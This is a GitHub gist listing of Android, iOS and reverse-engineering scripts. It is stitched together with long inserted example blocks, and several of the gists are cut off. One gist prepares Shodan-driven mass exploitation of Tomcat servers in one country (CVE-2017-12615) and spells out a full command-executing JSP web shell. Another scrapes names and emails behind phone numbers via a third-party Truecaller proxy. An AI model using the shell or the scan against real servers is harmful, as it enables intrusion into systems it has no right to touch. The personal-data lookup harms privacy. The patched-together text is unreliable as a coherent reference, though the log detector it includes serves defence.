@iddoeldor
iddoeldor / frida_server_install.sh
Last active April 14, 2024 15:23
one liner to download, push & run the latest frida server
# Device ABI (arm64-v8a, armeabi-v7a, x86, x86_64) mapped to the names frida uses in its release assets (arm64, arm, x86, x86_64)
OS='android'; ABI=$(adb shell getprop ro.product.cpu.abi | tr -d '\r');\
case "$ABI" in arm64-v8a) PARCH=arm64;; armeabi-v7a) PARCH=arm;; *) PARCH="$ABI";; esac;\
curl -s https://api.github.com/repos/frida/frida/releases/latest \
| jq -r --arg re "frida-server-.*-${OS}-${PARCH}"'\.xz$' '.assets[] | select(.browser_download_url | test($re)).browser_download_url' \
| xargs wget -q --show-progress \
&& unxz frida-server-*.xz \
&& adb root \
&& adb push frida-server-*-${OS}-${PARCH} /data/local/tmp/frida-server \
&& adb shell "chmod 755 /data/local/tmp/frida-server" \
&& adb shell "nohup /data/local/tmp/frida-server >/dev/null 2>&1 &"
# adb root only succeeds on userdebug/eng or rooted builds; the push still works without it, but frida-server then cannot attach to other apps
iddoeldor / shodan_bf_tomcat.py
Created January 5, 2018 19:45
Iterating Shodan results for Tomcat servers, sending HTTP PUT requests to upload a JSP shell (CVE-2017-12615)
import shodan
import requests
SHODAN_API_KEY = ""
COUNTRY = "IL"
JSP_SHELL = '<%@ page import="java.util.*,java.io.*"%><%%><HTML><BODY><H3>JSP SHELL</H3><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Execute"></FORM><PRE><%if (request.getParameter("cmd") !=null){out.println("Command: " +request.getParameter("cmd") + "<BR>");Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os=p.getOutputStream();InputStream in=p.getInputStream();DataInputStream dis=new DataInputStream(in);String disr=dis.readLine();while ( disr !=null ){out.println(disr);disr=dis.readLine();}}%></PRE></BODY></HTML>'
TEST_PAYLOAD = '<% out.write("<html><body>test</body></html>"); %>'
URL_PREFIX = 'http://'
SUFFIX_PORT = ':8080/'
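The upload primitive this gist relies on is Tomcat's Default servlet accepting HTTP PUT once its readonly init-param is set to false (the shipped default is true). A defensive counterpart, added here as an example and not part of the gist: a detector over Tomcat AccessLogValve lines in the common pattern (%h %l %u %t "%r" %s %b) that flags PUT requests aimed at .jsp files, including the suffix tricks used to get the file written under a path the JSP servlet will later serve (trailing slash, %20, ::$DATA), and ties a later GET carrying a query string back to an upload the server answered with 201/204. The log lines are constructed, and the status codes treated as "accepted" are an assumption about the deployment.

```python
import re
from typing import Dict, List, NamedTuple

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# A PUT whose path ends in .jsp, or .jsp plus a suffix that the Default servlet
# tolerates on write (trailing slash, encoded space, NTFS alternate data stream).
JSP_UPLOAD_RE = re.compile(r'\.jsp(?:/|%20|::\$DATA)?$', re.IGNORECASE)


class Finding(NamedTuple):
    host: str
    ts: str
    kind: str      # "upload" (PUT seen) or "exec" (GET with a query string to an uploaded JSP)
    target: str
    status: int


def canonical_jsp_path(target: str) -> str:
    """Drop the query string and the suffix tricks so a later GET can be matched
    to the PUT that created the file."""
    path = target.split('?', 1)[0]
    return re.sub(r'(?:/|%20|::\$DATA)$', '', path, flags=re.IGNORECASE)


def detect_jsp_put(lines: List[str]) -> List[Finding]:
    findings: List[Finding] = []
    uploaded: Dict[str, str] = {}   # canonical path -> host that uploaded it
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                # not a common-format line; skip rather than crash
        method, target, status = m['method'], m['target'], int(m['status'])
        path = target.split('?', 1)[0]
        if method == 'PUT' and JSP_UPLOAD_RE.search(path):
            # 201/204 mean the Default servlet wrote the file; 403/405 mean PUT was
            # refused (readonly=true), which is still an attempt worth recording.
            findings.append(Finding(m['host'], m['ts'], 'upload', target, status))
            if status in (201, 204):
                uploaded[canonical_jsp_path(target)] = m['host']
        elif method == 'GET' and '?' in target and canonical_jsp_path(target) in uploaded:
            findings.append(Finding(m['host'], m['ts'], 'exec', target, status))
    return findings


SAMPLE_LOG = [  # constructed sample lines, not taken from any real server
    '203.0.113.7 - - [05/Jan/2018:19:45:01 +0200] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.7 - - [05/Jan/2018:19:45:02 +0200] "PUT /shell.jsp/ HTTP/1.1" 201 -',
    '203.0.113.7 - - [05/Jan/2018:19:45:03 +0200] "GET /shell.jsp?cmd=id HTTP/1.1" 200 512',
    '198.51.100.9 - - [05/Jan/2018:19:46:10 +0200] "PUT /x.jsp%20 HTTP/1.1" 403 -',
    '192.0.2.44 - - [05/Jan/2018:19:47:00 +0200] "PUT /docs/notes.txt HTTP/1.1" 201 -',
    '192.0.2.44 - - [05/Jan/2018:19:47:05 +0200] "GET /index.jsp?cmd=id HTTP/1.1" 200 1024',
]


def main() -> None:
    for f in detect_jsp_put(SAMPLE_LOG):
        print(f'{f.kind:6} {f.host:14} {f.status} {f.target}')


if __name__ == '__main__':
    main()
```

On the sample the detector reports the accepted upload of /shell.jsp/, the follow-up GET /shell.jsp?cmd=id as execution, and the refused PUT /x.jsp%20 as an attempt; the .txt PUT and the GET to a JSP nobody uploaded are ignored. The real fix is on the server: leave readonly at its default of true in the Default servlet's web.xml and restrict PUT at the front proxy.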
iddoeldor / adb_db_print.py
Last active September 9, 2023 18:00
extract & print database content from android
import os
import sys
import subprocess
import sqlite3
import pandas as pd
arg_folder = sys.argv[1] # root folder to recursively search db files from
output_lines = subprocess.check_output(['adb', 'shell', ('ls -R %s' % arg_folder)]).decode('utf-8').splitlines()
db_files = []
current_folder = ''
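The gist above scrapes `ls -R` output to find database files, then pulls and prints them. Added here as an example, and not the rest of the gist (which the listing truncates): the two pieces that can be exercised offline, a parser for `ls -R` output that handles the "dir:" headers, blank separators and CRLF line endings adb sometimes emits, and a dumper that reads every user table out of a pulled SQLite file, quoting table names taken from sqlite_master instead of formatting them in. The `ls -R` text and the in-memory database are constructed; `pull_and_dump` assumes adb is on PATH and the device lets you read the app directory (adb root or `run-as <package>`).

```python
import os
import sqlite3
import subprocess
from typing import Dict, List

DB_SUFFIXES = ('.db', '.sqlite', '.sqlite3')


def parse_ls_r(output: str) -> List[str]:
    """Turn `ls -R <dir>` output into absolute device paths of SQLite files.

    `ls -R` prints a "<dir>:" header, the entries of that directory, then a
    blank line; toybox ls on Android follows the same layout."""
    paths: List[str] = []
    current = ''
    for raw in output.splitlines():
        line = raw.rstrip('\r')              # older adb emits CRLF line endings
        if not line:
            continue
        if line.endswith(':') and not line.startswith('ls:'):   # directory header, not an error
            current = line[:-1].rstrip('/')
            continue
        if line.endswith(DB_SUFFIXES):
            paths.append(f'{current}/{line}')   # device paths are always POSIX
    return paths


def dump_sqlite(conn: sqlite3.Connection) -> Dict[str, List[tuple]]:
    """Return {table: rows} for every user table. Names come from sqlite_master,
    so they are quoted as identifiers rather than trusted raw."""
    names = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    return {n: conn.execute('SELECT * FROM "%s"' % n.replace('"', '""')).fetchall()
            for n in names}


def pull_and_dump(device_paths: List[str], local_dir: str = '.') -> Dict[str, Dict[str, List[tuple]]]:
    """adb pull each database plus its -wal/-journal sidecar if present, then dump it.
    Without the sidecar, rows still sitting in the WAL are missing from the copy."""
    result: Dict[str, Dict[str, List[tuple]]] = {}
    for dev in device_paths:
        local = os.path.join(local_dir, os.path.basename(dev))
        subprocess.check_call(['adb', 'pull', dev, local])
        for side in ('-wal', '-journal'):    # best effort: these usually do not exist
            subprocess.call(['adb', 'pull', dev + side, local + side],
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        conn = sqlite3.connect(local)
        try:
            result[dev] = dump_sqlite(conn)
        finally:
            conn.close()
    return result


SAMPLE_LS = (  # constructed `adb shell ls -R /data/data/com.example` output
    '/data/data/com.example:\n'
    'cache\ndatabases\nshared_prefs\n\n'
    '/data/data/com.example/databases:\n'
    'chat.db\nchat.db-journal\nindex.sqlite\n\n'
    '/data/data/com.example/shared_prefs:\n'
    'prefs.xml\n'
)


def make_sample_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for a pulled app database."""
    conn = sqlite3.connect(':memory:')
    conn.executescript(
        'CREATE TABLE messages(id INTEGER PRIMARY KEY, sender TEXT, body TEXT);'
        "INSERT INTO messages VALUES (1, 'alice', 'hi'), (2, 'bob', 'hello');"
        'CREATE TABLE "odd name"(k TEXT);'
        "INSERT INTO \"odd name\" VALUES ('x');"
    )
    return conn


def main() -> None:
    print('would pull:', parse_ls_r(SAMPLE_LS))
    for table, rows in dump_sqlite(make_sample_db()).items():
        print(table, rows)


if __name__ == '__main__':
    main()
```

If the device has a usable find, `adb shell find /data/data/<pkg> -name '*.db'` gives the same list with no parsing at all; the parser is only for images where `ls -R` is all you have.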
iddoeldor / true_caller.py
Created November 16, 2017 06:41
extract name, email & image from Truecaller
import requests
from bs4 import BeautifulSoup
# third-party lookup page that proxies the query; not Truecaller's own API
api_url = 'https://xtremetricks.net/truecaller/truecall.php'
phone_number = '+972500000001'
res = {'number': phone_number}
req = requests.post(api_url, data=res)
iddoeldor / ios_ssh_over_usb_and_ipa_extractor.md
Last active October 16, 2022 05:01
and iOS related tips & tricks

extract db

Assumes an SSH tunnel over USB (usbmuxd, e.g. iproxy 2222 22) forwarding local port 2222 to the device's port 22. alpine is the default root password on a jailbroken device and should be changed; sshpass -p also shows the password to other local users in the process list.

PASS=alpine; PORT=2222; sshpass -p $PASS ssh -p $PORT root@localhost -t "cp \$(find /var/mobile/Containers/Data/Application/ -name 's4l*db') /private/var/tmp/skype.db" && sshpass -p $PASS scp -P $PORT root@localhost:/private/var/tmp/skype.db .

pull & read plist

The container UUID below belongs to one device and one install; list /private/var/mobile/Containers/Data/Application/ on the device to find the current one.

/tmp$ scp -P 2222 root@localhost:/private/var/mobile/Containers/Data/Application/F8C7294C-2B60-48EC-A987-D46B9FE4DEAE/Library/Preferences/com.skype.skype.plist .
/tmp$ sudo apt-get install libplist-utils
/tmp$ plistutil -i com.skype.skype.plist | less
iddoeldor / solve.py
Created June 30, 2019 10:26 — forked from inaz2/solve.py
angr example of input handling
$ gcc test.c
$ python solve.py
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | The program is accessing memory or registers with an unspecified value. This could indicate unwanted behavior.
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by:
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 1) setting a value to the initial state
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold null
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY_REGISTERS}, to suppress these messages.
WARNING | 2019-05-06 19:54:00,018 | angr.state_plugins.symbolic_memory | Filling register r15 with 8 unconstrained bytes referenced from 0x810 (__libc_csu_
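The warnings above are angr telling you it had to invent values for memory and registers the program read before writing; option 2 in that text (ZERO_FILL_UNCONSTRAINED_*) is the usual answer for a small crackme. The script below is an added example, not the forked solve.py (which this listing truncates): it gives the program a bounded symbolic stdin, zero-fills the unconstrained regions so those warnings go away, explores until stdout contains a success string, and concretises the input. test.c is not shown on this page, so the GOOD/BAD strings and the ./a.out path are assumptions; angr is imported inside solve() so the small helper runs without it installed.

```python
"""Recover the stdin that drives a binary to its success message with angr."""
import sys

GOOD = b'Correct'   # assumed success string printed by test.c; adjust to the real binary
BAD = b'Wrong'      # assumed failure string


def solve(binary: str, good: bytes = GOOD, bad: bytes = BAD, max_len: int = 32) -> bytes:
    """Return bytes that, fed on stdin, make `binary` print `good` and never `bad`."""
    import angr, claripy    # imported lazily so printable_input() works without angr installed
    proj = angr.Project(binary, auto_load_libs=False)
    # One free 8-bit variable per input byte; the solver picks their values.
    chars = [claripy.BVS(f'c{i}', 8) for i in range(max_len)]
    state = proj.factory.entry_state(
        stdin=claripy.Concat(*chars),
        add_options={angr.options.ZERO_FILL_UNCONSTRAINED_MEMORY,
                     angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS},  # option 2 from the warning text
    )
    for c in chars:         # keep the answer typable: printable ASCII only
        state.solver.add(c >= 0x20, c <= 0x7e)
    simgr = proj.factory.simulation_manager(state)
    simgr.explore(find=lambda s: good in s.posix.dumps(1),
                  avoid=lambda s: bad in s.posix.dumps(1))
    if not simgr.found:
        raise RuntimeError('no path reaches the success message within max_len bytes')
    return simgr.found[0].posix.dumps(0)   # concrete stdin for the found state


def printable_input(raw: bytes) -> str:
    """Cut the solver's stdin dump at the first NUL and drop trailing padding."""
    return raw.split(b'\x00', 1)[0].decode('ascii', 'replace').rstrip()


if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else './a.out'   # assumed output of `gcc test.c`
    print(printable_input(solve(target)))
```

If the binary reads with scanf("%s") or fgets, the printable-only constraint is what keeps the solver from returning a byte string you cannot type; drop it when the input is read as raw bytes.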
iddoeldor / UiccUnlock.cpp
Last active November 21, 2021 20:05 — forked from tewilove/UiccUnlock.cpp
Looks like a quasi-exploit to do a SIM unlock
#include <android/log.h>
#include <jni.h>
#include <binder/Binder.h>
#include <binder/Parcel.h>
#include <binder/IServiceManager.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
iddoeldor / make_an_android_app_debugabble_and_reinstall.sh
Created June 8, 2018 13:10
Make an android app debuggable and reinstall
#!/bin/sh
# Make an android app debuggable and reinstall
set -ex
DNAME="CN=Ross Patterson, OU=me, O=rpatterson.net, L=San Francisco, ST=CA, C=US"
PACKAGE_RE='^package:(/data/app/([^-]+)-.+==/(.+.apk))=.+'
MANIFEST_RE='(<application [^>]+)>'
export PATH=$HOME/Android/Sdk/platform-tools:$PATH
iddoeldor / read_pcap_data.py
Created June 6, 2018 21:20
iterate over pcap, base64 decode packet data w/ python
import json
from pprint import pprint
from scapy.all import *
packets = rdpcap('sniff.cap')
# Let's iterate through every packet
c = 1
arr = []
for packet in packets:
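The gist hands the file to scapy's rdpcap and loops over the packets. Added here as an example, and not the gist's own code: a dependency-free reader for the classic pcap format that walks Ethernet, IPv4 and TCP/UDP headers by hand and base64-decodes every payload that is valid base64, skipping the rest. It shows what rdpcap hides (the 24-byte global header whose magic fixes the byte order, 16-byte record headers, IP total length versus frame padding) and refuses pcapng, which a .cap produced by a recent tcpdump or Wireshark may well be. The capture is constructed in the block; the addresses, ports and payloads are made up.

```python
import base64
import binascii
import struct
from typing import Iterator, List, Tuple

PCAP_MAGIC_LE = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1


def iter_pcap_records(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (record_index, frame_bytes) from a classic (non-pcapng) pcap buffer,
    honouring the byte order announced by the magic number."""
    magic = struct.unpack('<I', data[:4])[0]
    if magic == PCAP_MAGIC_LE:
        endian = '<'
    elif magic == 0xD4C3B2A1:
        endian = '>'
    else:
        raise ValueError('not a classic pcap file (pcapng is not handled here)')
    link = struct.unpack(endian + 'HHiIII', data[4:24])[5]
    if link != LINKTYPE_ETHERNET:
        raise ValueError(f'unsupported link type {link}')
    off, idx = 24, 0
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + 'IIII', data[off:off + 16])
        off += 16
        frame = data[off:off + incl_len]
        if len(frame) < incl_len:
            break                      # truncated capture: stop rather than mis-parse
        off += incl_len
        idx += 1
        yield idx, frame


def l4_payload(frame: bytes) -> Tuple[str, bytes]:
    """Walk Ethernet -> IPv4 -> TCP/UDP and return (proto, application payload)."""
    if len(frame) < 34 or frame[12:14] != b'\x08\x00':   # not IPv4 over Ethernet
        return 'other', b''
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total = struct.unpack('!H', ip[2:4])[0]
    l4 = ip[ihl:total]                 # trust the IP total length, not the frame (padding)
    proto = ip[9]
    if proto == 6 and len(l4) >= 20:   # TCP: data offset in the upper nibble of byte 12
        return 'tcp', l4[(l4[12] >> 4) * 4:]
    if proto == 17 and len(l4) >= 8:   # UDP: fixed 8-byte header
        return 'udp', l4[8:]
    return 'other', b''


def decode_base64_payloads(pcap: bytes) -> List[Tuple[int, str, bytes]]:
    """Base64-decode every TCP/UDP payload that is valid base64, skipping the rest."""
    out: List[Tuple[int, str, bytes]] = []
    for idx, frame in iter_pcap_records(pcap):
        proto, payload = l4_payload(frame)
        if not payload:
            continue
        try:
            out.append((idx, proto, base64.b64decode(payload, validate=True)))
        except binascii.Error:
            continue                   # plain text or binary payload, not base64
    return out


def build_frame(payload: bytes, proto: str = 'tcp') -> bytes:
    """Constructed Ethernet/IPv4/TCP-or-UDP frame around `payload` (checksums left zero)."""
    if proto == 'tcp':   # sport, dport, seq, ack, data offset 5 words, PSH|ACK, window, csum, urg
        l4 = struct.pack('!HHIIBBHHH', 40000, 8080, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
        pnum = 6
    else:
        l4 = struct.pack('!HHHH', 40000, 53, 8 + len(payload), 0) + payload
        pnum = 17
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(l4), 0, 0, 64, pnum, 0,
                     bytes([192, 0, 2, 1]), bytes([198, 51, 100, 2])) + l4
    return b'\xff' * 6 + b'\x00\x11\x22\x33\x44\x55' + b'\x08\x00' + ip


def build_pcap(frames: List[bytes]) -> bytes:
    """Serialise frames into a little-endian classic pcap buffer."""
    buf = struct.pack('<IHHiIII', PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        buf += struct.pack('<IIII', 1515151515 + i, 0, len(f), len(f)) + f
    return buf


SAMPLE_PCAP = build_pcap([   # constructed capture, standing in for sniff.cap
    build_frame(base64.b64encode(b'{"user":"alice","token":"s3cr3t"}')),
    build_frame(b'GET / HTTP/1.1\r\n\r\n'),
    build_frame(base64.b64encode(b'ping'), proto='udp'),
    build_frame(b''),                  # bare ACK, no payload
])


def main() -> None:
    for idx, proto, decoded in decode_base64_payloads(SAMPLE_PCAP):
        print(idx, proto, decoded)


if __name__ == '__main__':
    main()
```

Only validate=True makes the "is it base64?" test meaningful; without it b64decode silently discards non-alphabet bytes and will "decode" plain text. Short all-alphabet payloads such as b'abcd' are valid base64 by construction, so on real traffic add a length or entropy check before trusting the decoded bytes.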
from ghidra.program.model.address import Address
from ghidra.program.model.mem import MemoryAccessException
from ghidra.program.flatapi import FlatProgramAPI
from ghidra.util.task import TaskMonitor
import math
import json
from os.path import isfile, join, dirname
import struct as st
import string